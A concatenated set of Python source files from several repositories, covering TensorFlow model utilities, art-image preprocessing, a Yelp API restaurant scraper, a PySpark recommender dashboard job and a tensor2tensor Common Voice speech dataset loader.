config['rate'],
tf.pow(tf.abs(ls_slope) + 1,
config['sharpness']),
name='full_curriculum_increment')
return full_increment
            # zero increment while the loss history still contains dummy entries
zero_increment_func = lambda: tf.constant(
0.0,
name='zero_curriculum_increment')
# final conditional increment
increment = tf.cond(
increment_pred,
full_increment_func,
zero_increment_func)
# create updating op. the semantics are such that
# training / gradient update is first performed
# before the curriculum is incremented.
with tf.control_dependencies(dependency_ops):
update_op = tf.assign_add(
step,
increment,
name='update_curriculum_op')
return update_op
```
#### File: UTGN/model/utils.py
```python
import numpy as np
import tensorflow as tf
from ast import literal_eval
class switch(object):
"""Switch iterator.
Attributes:
value: input value to test.
        fall: whether a previous case has already matched (enables fall-through)
"""
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
        return  # generator ends after one yield; raising StopIteration here is a RuntimeError under PEP 479
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args:
self.fall = True
return True
else:
return False
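# --- Editor's note: a hedged usage sketch, not part of the original file. It shows the
# for/if idiom used throughout model.py; the branch bodies are illustrative:
#   for case in switch('adam'):
#       if case('steepest'):
#           pass                         # not taken
#       elif case('adam', 'rmsprop'):
#           print('adaptive optimizer')  # taken: value matches one of the args
#       else:
#           print('unknown optimizer')   # default branch if nothing matched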
def merge_dicts(*dict_args):
"""Merges arbitrary number of dicts.
Gives precedence to latter dicts.
Args:
        *dict_args: arbitrary number of dicts
Returns:
a single merged dict
"""
result = {}
for dictionary in dict_args:
result.update(dictionary)
return result
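# --- Editor's note: a hedged example, not part of the original file; the keys and values
# are arbitrary and only illustrate the precedence rule:
#   merge_dicts({'lr': 0.001, 'decay': 0.9}, {'lr': 0.01})
#   # -> {'lr': 0.01, 'decay': 0.9}   (later dicts win on key collisions)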
def ops_to_dict(session, ops):
"""Converts canonical dict of TF ops to an actual dict.
Runs ops first.
Args:
session: tf session
ops: dict mapping name to tf operation
Returns:
dict
"""
dict_ = dict(list(zip(list(ops.keys()), session.run(list(ops.values())))))
return dict_
def cum_quantile_positions(weights, quantiles=np.linspace(0.25, 0.99, 4)):
""" Computes cumulative quantiles from curriculum weights. """
if len(weights) != 0:
return [next(x[0] + 1 for x
in enumerate(np.cumsum(weights / sum(weights))) if x[1] > p)
for p in quantiles]
else:
return []
def dict_to_init(dict_, seed=None, dtype=tf.float32):
"""Decide the appropriate initializer.
Args:
dict_: config dict
seed: random seed
dtype: datatype
Returns:
TF initialization
"""
init_center = dict_.get('center', 0.0)
init_range = dict_.get('range', 0.01)
init_dist = dict_.get('dist', 'gaussian')
init_scale = dict_.get('scale', 1.0)
init_mode = dict_.get('mode', 'fan_in') # also accepts fan_out, fan_avg
for case in switch(init_dist):
if case('gaussian'):
init = tf.initializers.random_normal(init_center,
init_range,
seed=seed,
dtype=dtype)
elif case('uniform'):
init = tf.initializers.random_uniform(init_center - init_range,
init_center + init_range,
seed=seed,
dtype=dtype)
elif case('orthogonal'):
init = tf.initializers.orthogonal(init_scale,
seed=seed,
dtype=dtype)
elif case('gaussian_variance_scaling'):
init = tf.initializers.variance_scaling(init_scale,
init_mode,
'normal',
seed=seed,
dtype=dtype)
elif case('uniform_variance_scaling'):
init = tf.initializers.variance_scaling(init_scale,
init_mode,
'uniform',
seed=seed,
dtype=dtype)
return init
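# --- Editor's note: a hedged example, not part of the original file; the config keys
# follow the defaults read above:
#   init = dict_to_init({'dist': 'uniform', 'center': 0.0, 'range': 0.05}, seed=42)
#   # equivalent to tf.initializers.random_uniform(-0.05, 0.05, seed=42, dtype=tf.float32)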
def dict_to_inits(dict_, seed=None, dtype=tf.float32):
"""Decide appropriate initializer.
Args:
dict_: dict of config dicts
seed: random seed
dtype: datatype
Returns:
dict of TF initialization
"""
inits = {k: dict_to_init(v, seed, dtype) for k, v in dict_.items()}
return inits
def count_trainable_params():
"""Count the total trainable parameters. """
total_params = [np.prod(v.get_shape().as_list())
for v in tf.trainable_variables()]
return np.sum(total_params)
``` |
{
"source": "JinLi711/Web-Scraping-Yelp",
"score": 2
} |
#### File: Art_Recognition/trial_run/setup.py
```python
import os
import matplotlib.pyplot as plt
import numpy as np
# image processing
from PIL import Image
import skimage.io
import skimage.transform
#======================================================================
# Default Variable Assignments
#======================================================================
train_path = "art_images/dataset_updated/training_set"
test_path = "art_images/dataset_updated/validation_set"
corrupt_path = "art_images/dataset_updated/training_set_corrupted"
categories = ['drawings', 'engraving', 'iconography', 'painting', 'sculpture']
category_embeddings = {
'drawings': 0,
'engraving': 1,
'iconography': 2,
'painting': 3,
'sculpture': 4
}
width = 96 # 368
height = 96 # 352
n_channels = 3
#======================================================================
# Brief Visualizations
#======================================================================
def view_freq(categories, training_dataset_path):
"""
Create a bar graph for visualizing categorical frequencies
:param categories: list of categories
:type categories: list
:param training_dataset_path: relative path of the training dataset
:type training_dataset_path: str
"""
n_imgs = []
for cat in categories:
files = os.listdir(os.path.join(training_dataset_path, cat))
n_imgs += [len(files)]
plt.bar([_ for _ in range(len(categories))], n_imgs, tick_label=categories)
plt.title("Category Frequencies")
plt.show()
def view_images(categories, training_dataset_path):
"""
View one image from each category
:param categories: list of categories
:type categories: list
:param training_dataset_path: relative path of the training dataset
:type training_dataset_path: str
"""
    n_categories = len(categories)
fig, axes = plt.subplots(nrows=1, ncols=n_categories, figsize=(15, 3))
cat_cpt=0
for cat in categories:
category_path = os.path.join(training_dataset_path, cat)
img_name = os.listdir(category_path)[1]
img = skimage.io.imread(os.path.join(category_path, img_name))
img = skimage.transform.resize(img, (width, height, n_channels), mode='reflect')
axes[cat_cpt].imshow(img, resample=True)
axes[cat_cpt].set_title(cat, fontsize=8)
cat_cpt += 1
plt.show()
#======================================================================
# File Preprocessing
#======================================================================
def get_file_names(categories, training_dataset_path, test_dataset_path):
"""
Get all the file names and its category
:param categories: list of categories
:type categories: list
:param training_dataset_path: relative path of the training dataset
:type training_dataset_path: str
:param test_dataset_path: relative path of the test dataset
:type test_dataset_path: str
:returns: (list of tuples of train, where first element of tuple is file name,
and second element is the category, list of tuples of test)
:rtype: (list, list)
"""
training_data = []
for cat in categories:
files = os.listdir(os.path.join(training_dataset_path, cat))
for file in files:
training_data.append((os.path.join(cat, file), cat))
test_data = []
for cat in categories:
files = os.listdir(os.path.join(test_dataset_path, cat))
for file in files:
test_data.append((os.path.join(cat, file), cat))
return training_data, test_data
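# --- Editor's note: a hedged example, not part of the original file; the file name shown
# is illustrative, the module-level defaults above are assumed:
#   training_data, test_data = get_file_names(categories, train_path, test_path)
#   training_data[0]   # e.g. ('drawings/0001.jpg', 'drawings')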
def move_bad_file(tuples_list, dataset_path, corrupt_path):
"""
Move corrupted images to new folder.
:param tuples_list: list of tuples,
where first element of tuple is file name,
and second element is the category,
:type tuples_list: list
:param dataset_path: relative path of the dataset
:type dataset_path: str
:param corrupt_path: relative path where corrupted files are moved
:type corrupt_path: str
"""
indexes = np.arange(len(tuples_list))
n_samples = len(indexes)
for i in range(n_samples):
t = tuples_list[indexes[i]]
path_name = os.path.join(dataset_path, t[0])
try:
img = Image.open(path_name)
except FileNotFoundError:
# corrupt file has already been moved
pass
except (IOError, SyntaxError) as e:
print("Bad file:", t[0])
# move file
os.rename(path_name, os.path.join(corrupt_path, t[0]))
```
#### File: Scraping/API/restaurant_scrape.py
```python
from __future__ import print_function
import json
import re
import requests
import sys
import urllib3
import signal
import MySQLdb
import logging
import pprint
#from urllib3 import HTTPError
from urllib.parse import quote
#from urllib import urlencode
API_KEY = 'FILL'
# API constants, you shouldn't have to change these.
API_HOST = 'https://api.yelp.com'
SEARCH_PATH = '/v3/businesses/search'
SEARCH_PATH_BEST = '/v3/business/matches/best'
BUSINESS_PATH = '/v3/businesses/' # Business ID will come after slash.
DEFAULT_TERM = 'dinner'
DEFAULT_LOCATION = 'San Francisco, CA'
SEARCH_LIMIT = 1
DBHOST = 'localhost'
DBUSER = 'restaurants'
DBPASS = ''
DB = 'restaurants'
LOGFILE = 'restaurants_chi.log'
rcount = 0
list_left = 0
logging.basicConfig(format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
filename=LOGFILE,
level=logging.INFO)
def signal_handler(signal, frame):
print('Ouch!')
logging.info('*** killed process. completed %s entries.', rcount)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
'''
def get_list():
global DBHOST, DBUSER, DBPASS, DB
print("Getting list from database")
data = []
Error = ""
try:
db = MySQLdb.connect(host=DBHOST,
user=DBUSER,
passwd=DBPASS,
db=DB,
use_unicode=True,
charset="utf8")
cursor = db.cursor()
cursor.execute('SELECT DISTINCT DBA_Name, AKA_Name, Address
AS Latest_Insp FROM food_inspection_chi
WHERE Results != 'Out of Business'
AND Facility_Type = "Restaurant"
AND Inspection_Date >= '2016-01-01'
GROUP BY Address;')
row = cursor.fetchone()
while row is not None:
data.append(row)
row = cursor.fetchone()
except Error as e:
print(e)
finally:
cursor.close()
db.close()
return data
'''
def request(host, path, api_key, url_params=None):
"""Given your API_KEY, send a GET request to the API.
Args:
host (str): The domain host of the API.
path (str): The path of the API after the domain.
API_KEY (str): Your API Key.
url_params (dict): An optional set of query parameters in the request.
Returns:
dict: The JSON response from the request.
Raises:
HTTPError: An error occurs from the HTTP request.
"""
url_params = url_params or {}
url = '{0}{1}'.format(host, quote(path.encode('utf8')))
headers = {
'Authorization': 'Bearer %s' % api_key,
}
# print(u'Querying {0} ...'.format(url))
response = requests.request('GET', url, headers=headers, params=url_params)
return response.json()
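# Hedged usage sketch (not part of the original flow): a single call to the
# generic request() helper against the Yelp search endpoint. The search term
# below is a placeholder, not data used by this script.
def _example_search_request(api_key):
    params = {'term': 'tacos', 'location': DEFAULT_LOCATION, 'limit': SEARCH_LIMIT}
    return request(API_HOST, SEARCH_PATH, api_key, url_params=params)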
def business_lookup(api_key, term, address):
global rcount
url_params = {
        'name': term.replace(' ', '+'),
'location': address,
'city': "Chicago",
'state': "IL",
'country': "US",
}
return request(API_HOST, SEARCH_PATH_BEST, api_key, url_params=url_params)
def search(api_key, term, address):
global rcount
# term = re.sub('(?:\s\W | LLC| INC|, LLC)', ' ', term.rstrip())
    term = re.sub(r'(?:\s\W |#|\.|,|\d| RESTAURANT|CAFE|TAQUERIA| LLC| INC|, LLC|\([^)]*\))', ' ', term.rstrip())
url_params = {
'term': term.replace(' ', '+'),
'location': address,
'radius': "50",
'limit': SEARCH_LIMIT
}
results = request(API_HOST, SEARCH_PATH, api_key, url_params=url_params)
# print(results)
# print(url_params)
try:
        if results['total'] == 0:
print('\033[91m not found\n\033[0m')
logging.info('not found %s %s', term, address)
    except (KeyError, TypeError):
        print('no total count in response')
try:
for value in results['businesses']:
try:
business_id = results['businesses'][0]['id']
except:
continue
business_name = results['businesses'][0]['name']
is_closed = results['businesses'][0]['is_closed']
if is_closed:
is_closed = "true"
else:
is_closed = "false"
review_count = results['businesses'][0]['review_count']
business_address1 = results['businesses'][0]['location']['address1']
business_city = results['businesses'][0]['location']['city']
business_state = results['businesses'][0]['location']['state']
business_country = results['businesses'][0]['location']['country']
business_zip = results['businesses'][0]['location']['zip_code']
try:
business_price = str(len(results['businesses'][0]['price']))
except KeyError:
business_price = "NA"
business_rating = str(results['businesses'][0]['rating'])
business_categories = []
business_category0 = "NA"
business_category1 = "NA"
business_category2 = "NA"
for category in results['businesses'][0]['categories']:
business_categories.append(category['alias'])
if len(business_categories) == 3:
business_category0, business_category1, business_category2 = business_categories
elif len(business_categories) == 2:
business_category0, business_category1 = business_categories
business_category2 = "NA"
elif len(business_categories) == 1:
business_category0 = business_categories[0]
business_category1 = "NA"
business_category2 = "NA"
elif len(business_categories) == 0:
business_category0 = "NA"
business_category1 = "NA"
business_category2 = "NA"
business_lat = results['businesses'][0]['coordinates']['latitude']
business_lon = results['businesses'][0]['coordinates']['longitude']
rcount = rcount + 1
            print('\033[0m', " adding:", '\033[92m', business_name, '\033[93m', business_address1, '\033[0m', "\n")
logging.info('added %s %s', business_name, business_address1)
update_db(business_id, business_name, review_count,
business_address1, business_city, business_state,
business_country, business_zip, business_price,
business_rating, business_category0, business_category1,
business_category2, business_lat, business_lon, is_closed)
    except Exception as e:
        print('business error:', e)
def get_business(api_key, business_id):
"""Query the Business API by a business ID.
Args:
business_id (str): The ID of the business to query.
Returns:
dict: The JSON response from the request.
"""
business_path = BUSINESS_PATH + business_id
return request(API_HOST, business_path, api_key)
'''
def update_db(business_id, business_name, review_count, business_address1,
business_city, business_state, business_country, business_zip,
business_price, business_rating, business_category0,
business_category1, business_category2, business_lat, business_lon, is_closed):
global DBHOST, DBUSER, DBPASS, DB
db = MySQLdb.connect(host=DBHOST,
user=DBUSER,
passwd=DBPASS,
db=DB,
use_unicode=True,
charset="utf8")
cursor = db.cursor()
cursor.execute('INSERT into restaurants_chi (id, name, review_count, address, city,
state, country, zip, price, rating, category0, category1,
category2, latitude, longitude, is_closed) VALUES (%s, %s, %s, %s, %s,
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) ON DUPLICATE
KEY UPDATE id = VALUES(id), rating = VALUES(rating),
latitude = VALUES(latitude), longitude = VALUES(longitude)
', (business_id, business_name, review_count, business_address1,
business_city, business_state, business_country,
business_zip, business_price, business_rating,
business_category0, business_category1,
business_category2, business_lat, business_lon, is_closed))
db.commit()
db.close()
'''
def main():
global list_left
logging.info('*** starting new run.')
#inspection_list = get_list()
#list_left = len(inspection_list)
logging.info('loaded %s entries from food_inspection_chi db', list_left)
inspection_list = [["MCDONALD'S", "41.720224099058896", "-87.6433279836791"]]
list_left = len(inspection_list)
for dbname, akaname, address, in inspection_list:
if akaname:
if len(address) >= 3:
print('\033[0m', 'searching AKA_name:', '\033[92m', akaname, '\033[93m', address, '\033[0m', list_left, 'remaining')
logging.info('searching AKA_Name: %s %s', dbname, address)
search(API_KEY, akaname, address)
list_left = list_left - 1
else:
if len(address) >= 3:
print('\033[0m', 'searching DBA_Name:', '\033[92m', dbname, '\033[93m', address, '\033[0m', list_left, 'remaining')
logging.info('searching DBA_Name: %s %s', dbname, address)
search(API_KEY, dbname, address)
list_left = list_left - 1
# print(dbname, latitude, longitude)
logging.info('*** finished. completed %s entries', rcount)
if __name__ == '__main__':
main()
``` |
{
"source": "JinLi97/recommender-system-dev-workshop-code",
"score": 3
} |
#### File: movie/dashboard/process.py
```python
import argparse
import json
import time
import boto3
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, size, window, instr, lower
def list_s3_by_prefix(bucket, prefix, filter_func=None):
print(f"list_s3_by_prefix bucket: {bucket}, prefix: {prefix}")
s3_bucket = boto3.resource('s3').Bucket(bucket)
if filter_func is None:
key_list = [s.key for s in s3_bucket.objects.filter(Prefix=prefix)]
else:
key_list = [s.key for s in s3_bucket.objects.filter(
Prefix=prefix) if filter_func(s.key)]
print("list_s3_by_prefix return:", key_list)
return key_list
def s3_copy(bucket, from_key, to_key):
s3_bucket = boto3.resource('s3').Bucket(bucket)
copy_source = {
'Bucket': bucket,
'Key': from_key
}
s3_bucket.copy(copy_source, to_key)
print("copied s3://{}/{} to s3://{}/{}".format(bucket, from_key, bucket, to_key))
def s3_upload(file, bucket, s3_key):
s3_bucket = boto3.resource('s3').Bucket(bucket)
s3_bucket.Object(s3_key).upload_file(file)
print("uploaded file {} to s3://{}/{}".format(file, bucket, s3_key))
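# Hedged usage sketch (never called by this job): combining the three S3
# helpers above. The bucket name, prefixes and keys are assumptions.
def _example_s3_helpers():
    bucket_name = "my-example-bucket"  # hypothetical bucket
    keys = list_s3_by_prefix(bucket_name, "system/ingest-data/",
                             filter_func=lambda k: k.endswith(".csv"))
    if keys:
        s3_copy(bucket_name, keys[0], "backup/" + keys[0])
    s3_upload("dashboard.json", bucket_name, "system/dashboard/dashboard.json")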
parser = argparse.ArgumentParser(description="app inputs and outputs")
parser.add_argument("--bucket", type=str, help="s3 bucket")
parser.add_argument("--prefix", type=str,
help="s3 input key prefix")
parser.add_argument("--region", type=str, help="aws region")
args, _ = parser.parse_known_args()
print("args:", args)
if args.region:
print("region:", args.region)
boto3.setup_default_session(region_name=args.region)
bucket = args.bucket
prefix = args.prefix
if prefix.endswith("/"):
prefix = prefix[:-1]
print(f"bucket:{bucket}, prefix:{prefix}")
# input_prefix=recommender-system-news-open-toutiao/system/item-data/raw-input/
# output_prefix=recommender-system-news-open-toutiao/system/item-data/emr-out/
item_input_file = "s3://{}/{}/system/ingest-data/item/".format(bucket, prefix)
action_input_file = "s3://{}/{}/system/ingest-data/action/".format(bucket, prefix)
user_input_file = "s3://{}/{}/system/ingest-data/user/".format(bucket, prefix)
output_file_key = "{}/system/dashboard/dashboard.json".format(prefix)
print("item_input_file:", item_input_file)
print("action_input_file:", action_input_file)
print("user_input_file:", user_input_file)
# item_input_file = '/Users/yonmzn/tmp/item/'
# action_input_file = '/Users/yonmzn/tmp/action/'
# user_input_file = '/Users/yonmzn/tmp/user/'
statistics_dict = {}
WIN_SIZE = "60 minutes"
def item_statistics(df_item_input):
print("item_statistics enter")
global statistics_dict
total_item_count = df_item_input.select("item_id").dropDuplicates(["item_id"]).count()
statistics_dict["total_item_count"] = total_item_count
# is_new_count = df_item_input.selectExpr("id", "cast(is_new as int)").groupby("id").min("is_new").groupby(
# "min(is_new)").count().collect()
# for row in is_new_count:
# is_new, count = row['min(is_new)'], row['count']
# if is_new == 1:
# statistics_dict["new_item_count"] = count
# break
print("item_statistics done")
def user_statistics(df_user_input):
print("user_statistics enter")
global statistics_dict
total_user_count = df_user_input.count()
anonymous_user_count = df_user_input.where(
(col('user_name') == '') | (instr(lower(col('user_name')), "anonymous") >= 1)).count()
register_user_count = total_user_count - anonymous_user_count
statistics_dict['total_user_count'] = total_user_count
statistics_dict['register_user_count'] = register_user_count
statistics_dict['anonymous_user_count'] = anonymous_user_count
print("user_statistics done")
def action_statistics(df_action_input, df_item_input, df_user_input):
print("action_statistics enter")
global statistics_dict
df_item = df_item_input.select(col("item_id"),
col("category_property"),
col("title")).dropDuplicates(["item_id"])
df_item.cache()
    if statistics_dict.get("total_item_count"):
        total_item_count = statistics_dict["total_item_count"]
    else:
        total_item_count = df_item.count()
df_user = df_user_input.select("user_id", "user_name")
df_user.cache()
#recommender_count = df_action_input.where(col('click_source') == '1').count()
#recommender_click_count = df_action_input.where((col('click_source') == '1') & (col("action_value") == '1')).count()
#statistics_dict['recommender_click_cover_ratio'] = int((recommender_click_count / recommender_count) * 100) / 100
df_clicked_action_event = df_action_input.where(col("action_value") == '1')
# total_click_item_count = df_clicked_action_event.select('item_id').dropDuplicates(['item_id']).count()
item_in_action_count = df_action_input.select(col('item_id')).distinct().count()
statistics_dict['recommender_click_cover_ratio'] = int((item_in_action_count / total_item_count) * 100) / 100
click_item_in_action_count = df_action_input.where(col("action_value") == '1').select(col('item_id')).distinct().count()
statistics_dict['item_click_ratio'] = int((click_item_in_action_count / item_in_action_count) * 100) / 100
total_click_count = df_clicked_action_event.count()
statistics_dict['total_click_count'] = total_click_count
print("total_click_count: ", total_click_count)
print("begin finding top_users ...")
df_action_event = df_clicked_action_event. \
withColumn("timestamp_bigint", col('timestamp').cast('bigint')). \
withColumn("event_time", col('timestamp_bigint').cast('timestamp')). \
drop(col('timestamp_bigint')). \
drop(col('action_type')). \
drop(col('action_value')). \
drop(col('timestamp'))
join_type = "inner"
df_action_event_full = df_action_event.join(df_item, ['item_id'], join_type) \
.join(df_user, ['user_id'], join_type)
# df_action_hour = df_action_event_full.withColumn('date', col('event_time').cast("date")).withColumn('hour', hour(col('event_time')))
df_action_user_window = df_action_event_full.groupBy(window(col('event_time'), WIN_SIZE), col('user_id'),
col('user_name')).count()
df_action_user_window_sort = df_action_user_window.orderBy([col('window').desc(), col('count').desc()])
user_rows = df_action_user_window_sort.select(col("user_id"), col("user_name"), col('count')).take(100)
top_10_user_ids = []
top_10_user = []
for user in user_rows:
user_id = user['user_id']
user_name = user['user_name']
count = user['count']
if user_id not in top_10_user_ids:
top_10_user_ids.append(user_id)
top_10_user.append({
'user_id': user_id,
"name": user_name,
"count": int(count)
})
if len(top_10_user_ids) >= 10:
break
statistics_dict['top_users'] = top_10_user
print("begin finding top_items ...")
df_action_item_window = df_action_event_full.groupBy(window(col('event_time'), WIN_SIZE), col('item_id'),
col('title')).count()
df_action_item_window_sort = df_action_item_window.orderBy([col('window').desc(), col('count').desc()])
item_rows = df_action_item_window_sort.select(col("item_id"), col("title"), col('count')).take(100)
top_10_item_ids = []
top_10_item = []
for item_row in item_rows:
item_id = item_row['item_id']
title = item_row['title']
count = item_row['count']
if item_id not in top_10_item_ids:
top_10_item_ids.append(item_id)
top_10_item.append({
"id": item_id,
"title": title,
"count": int(count)
})
if len(top_10_item_ids) >= 10:
break
statistics_dict['top_items'] = top_10_item
print("begin finding click_count_by_source ...")
click_count_by_source = []
action_source_total_rows = df_action_event_full.groupBy(col('click_source')).count().collect()
for row in action_source_total_rows:
click_count_by_source.append(
{
"source": 'recommend' if str(row['click_source']) == '1' else row['click_source'],
"count": row['count']
}
)
statistics_dict['click_count_by_source'] = click_count_by_source
print("begin finding click_count_by_source_time_window ...")
df_action_event_recommender = df_action_event_full.withColumn("is_recommender", col('click_source') == '1')
df_action_event_recommender_window = df_action_event_recommender \
.groupBy(window(col('event_time'), WIN_SIZE), col('is_recommender')).count()
n_hours = 8
start_time = \
df_action_event_recommender_window.select(col("window")['start']).orderBy([col('window.start').desc()]).take(
n_hours)[-1][
'window.start']
df_action_recommender_n_hours = df_action_event_recommender_window.where(
col("window")['start'] >= start_time).orderBy(
[col('window')])
recommender_n_hours = df_action_recommender_n_hours.collect()
clicked_by_recommender = []
for row in recommender_n_hours:
start_time = int(row['window']['start'].timestamp())
end_time = int(row['window']['end'].timestamp())
is_recommender = row['is_recommender']
count = row['count']
clicked_by_recommender.append({
"start_time": start_time,
"end_time": end_time,
"is_recommender": is_recommender,
"count": count
})
statistics_dict['click_count_recommender_time_window'] = clicked_by_recommender
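# Hedged illustration (defined but never called by this job): the windowed
# top-N pattern used in action_statistics(), applied to a tiny in-memory
# DataFrame. The column names and sample rows are assumptions.
def _example_windowed_top_n(spark_session):
    toy = spark_session.createDataFrame(
        [("u1", "2021-01-01 10:05:00"), ("u1", "2021-01-01 10:20:00"),
         ("u2", "2021-01-01 10:30:00")],
        ["user_id", "event_time"])
    counts = (toy.withColumn("event_time", col("event_time").cast("timestamp"))
              .groupBy(window(col("event_time"), WIN_SIZE), col("user_id"))
              .count()
              .orderBy(col("window").desc(), col("count").desc()))
    return counts.take(10)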
with SparkSession.builder.appName("Spark App - item preprocessing").getOrCreate() as spark:
#
# item data
#
df_item_input = spark.read.text(item_input_file)
df_item_input = df_item_input.selectExpr("split(value, '_!_') as row").where(
size(col("row")) > 12).selectExpr("row[0] as item_id",
"row[1] as program_type",
"row[2] as title",
"row[3] as release_year",
"row[4] as director",
"row[5] as actor",
"row[6] as category_property",
"row[7] as language",
"row[8] as ticket_num",
"row[9] as popularity",
"row[10] as score",
"row[11] as level",
"row[12] as is_new"
)
df_item_input.cache()
print("df_item_input OK")
#
# action data
#
df_action_input = spark.read.text(action_input_file)
df_action_input = df_action_input.selectExpr("split(value, '_!_') as row").where(
size(col("row")) > 5).selectExpr("row[0] as user_id",
"row[1] as item_id",
"row[2] as timestamp",
"cast(row[3] as string) as action_type",
"row[4] as action_value",
"row[5] as click_source",
)
# df_action_input = df_action_input.withColumn("click_source", lit("1"))
df_action_input.cache()
print("df_action_input OK")
#
# user data
#
df_user_input = spark.read.text(user_input_file)
df_user_input = df_user_input.selectExpr("split(value, '_!_') as row").where(
size(col("row")) > 4).selectExpr("row[0] as user_id",
"row[4] as user_name",
).dropDuplicates(["user_id"])
print("df_user_input OK")
df_user_input.cache()
item_statistics(df_item_input)
action_statistics(df_action_input, df_item_input, df_user_input)
user_statistics(df_user_input)
statistics_dict["report_time"] = int(time.time())
print("statistics_dict:", statistics_dict)
file_name = "dashboard.json"
with open(file_name, 'w', encoding='utf8') as out:
json.dump(statistics_dict, out, indent=1, ensure_ascii=False)
s3_upload(file_name, bucket, output_file_key)
print("Done!")
``` |
{
"source": "jinliangwei/tensor2tensor",
"score": 2
} |
#### File: tensor2tensor/data_generators/common_voice.py
```python
import csv
import os
import tarfile
import tqdm # pylint: disable=g-bad-import-order
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import problem
from tensor2tensor.data_generators import speech_recognition
from tensor2tensor.utils import registry
import tensorflow as tf
_COMMONVOICE_URL = "https://common-voice-data-download.s3.amazonaws.com/cv_corpus_v1.tar.gz" # pylint: disable=line-too-long
_COMMONVOICE_TRAIN_DATASETS = ["cv-valid-train", "cv-other-train"]
_COMMONVOICE_DEV_DATASETS = ["cv-valid-dev", "cv-other-dev"]
_COMMONVOICE_TEST_DATASETS = ["cv-valid-test", "cv-other-test"]
def _collect_data(directory):
"""Traverses directory collecting input and target files.
Args:
directory: base path to extracted audio and transcripts.
Returns:
list of (media_base, media_filepath, label) tuples
"""
# Returns:
data_files = []
transcripts = [
filename for filename in os.listdir(directory)
if filename.endswith(".csv")
]
for transcript in transcripts:
transcript_path = os.path.join(directory, transcript)
with open(transcript_path, "r") as transcript_file:
transcript_reader = csv.reader(transcript_file)
# skip header
_ = next(transcript_reader)
for transcript_line in transcript_reader:
media_name, label = transcript_line[0:2]
filename = os.path.join(directory, media_name)
data_files.append((media_name, filename, label))
return data_files
def _file_exists(path, filename):
"""Checks if the filename exists under the path."""
return os.path.isfile(os.path.join(path, filename))
def _is_relative(path, filename):
"""Checks if the filename is relative, not absolute."""
return os.path.abspath(os.path.join(path, filename)).startswith(path)
@registry.register_problem()
class CommonVoice(speech_recognition.SpeechRecognitionProblem):
"""Problem spec for Commonvoice using clean and noisy data."""
# Select only the clean data
TRAIN_DATASETS = _COMMONVOICE_TRAIN_DATASETS[:1]
DEV_DATASETS = _COMMONVOICE_DEV_DATASETS[:1]
TEST_DATASETS = _COMMONVOICE_TEST_DATASETS[:1]
@property
def num_shards(self):
return 100
@property
def use_subword_tokenizer(self):
return False
@property
def num_dev_shards(self):
return 1
@property
def num_test_shards(self):
return 1
@property
def use_train_shards_for_dev(self):
"""If true, we only generate training data and hold out shards for dev."""
return False
def generator(self,
data_dir,
tmp_dir,
datasets,
eos_list=None,
start_from=0,
how_many=0):
del eos_list
i = 0
filename = os.path.basename(_COMMONVOICE_URL)
compressed_file = generator_utils.maybe_download(tmp_dir, filename,
_COMMONVOICE_URL)
read_type = "r:gz" if filename.endswith(".tgz") else "r"
with tarfile.open(compressed_file, read_type) as corpus_tar:
# Create a subset of files that don't already exist.
# tarfile.extractall errors when encountering an existing file
# and tarfile.extract is extremely slow. For security, check that all
# paths are relative.
members = [
f for f in corpus_tar if _is_relative(tmp_dir, f.name) and
not _file_exists(tmp_dir, f.name)
]
corpus_tar.extractall(tmp_dir, members=members)
data_dir = os.path.join(tmp_dir, "cv_corpus_v1")
data_tuples = _collect_data(data_dir)
encoders = self.feature_encoders(None)
audio_encoder = encoders["waveforms"]
text_encoder = encoders["targets"]
for dataset in datasets:
data_tuples = (tup for tup in data_tuples if tup[0].startswith(dataset))
for utt_id, media_file, text_data in tqdm.tqdm(
sorted(data_tuples)[start_from:]):
if how_many > 0 and i == how_many:
return
i += 1
wav_data = audio_encoder.encode(media_file)
yield {
"waveforms": wav_data,
"waveform_lens": [len(wav_data)],
"targets": text_encoder.encode(text_data),
"raw_transcript": [text_data],
"utt_id": [utt_id],
"spk_id": ["unknown"],
}
def generate_data(self, data_dir, tmp_dir, task_id=-1):
train_paths = self.training_filepaths(
data_dir, self.num_shards, shuffled=False)
dev_paths = self.dev_filepaths(
data_dir, self.num_dev_shards, shuffled=False)
test_paths = self.test_filepaths(
data_dir, self.num_test_shards, shuffled=True)
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, self.TEST_DATASETS), test_paths)
if self.use_train_shards_for_dev:
all_paths = train_paths + dev_paths
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, self.TRAIN_DATASETS), all_paths)
generator_utils.shuffle_dataset(all_paths)
else:
generator_utils.generate_dataset_and_shuffle(
self.generator(data_dir, tmp_dir, self.TRAIN_DATASETS), train_paths,
self.generator(data_dir, tmp_dir, self.DEV_DATASETS), dev_paths)
@registry.register_problem()
class CommonVoiceTrainFullTestClean(CommonVoice):
"""Problem to train on full set, but evaluate on clean data only."""
def training_filepaths(self, data_dir, num_shards, shuffled):
return CommonVoice.training_filepaths(self, data_dir, num_shards, shuffled)
def dev_filepaths(self, data_dir, num_shards, shuffled):
return CommonVoiceClean.dev_filepaths(self, data_dir, num_shards, shuffled)
def test_filepaths(self, data_dir, num_shards, shuffled):
return CommonVoiceClean.test_filepaths(self, data_dir, num_shards, shuffled)
def generate_data(self, data_dir, tmp_dir, task_id=-1):
raise Exception("Generate Commonvoice and Commonvoice_clean data.")
def filepattern(self, data_dir, mode, shard=None):
"""Get filepattern for data files for mode.
Matches mode to a suffix.
* DatasetSplit.TRAIN: train
* DatasetSplit.EVAL: dev
* DatasetSplit.TEST: test
* tf.estimator.ModeKeys.PREDICT: dev
Args:
data_dir: str, data directory.
mode: DatasetSplit
shard: int, if provided, will only read data from the specified shard.
Returns:
filepattern str
"""
shard_str = "-%05d" % shard if shard is not None else ""
if mode == problem.DatasetSplit.TRAIN:
path = os.path.join(data_dir, "common_voice")
suffix = "train"
elif mode in [problem.DatasetSplit.EVAL, tf.estimator.ModeKeys.PREDICT]:
path = os.path.join(data_dir, "common_voice_clean")
suffix = "dev"
else:
assert mode == problem.DatasetSplit.TEST
path = os.path.join(data_dir, "common_voice_clean")
suffix = "test"
return "%s-%s%s*" % (path, suffix, shard_str)
@registry.register_problem()
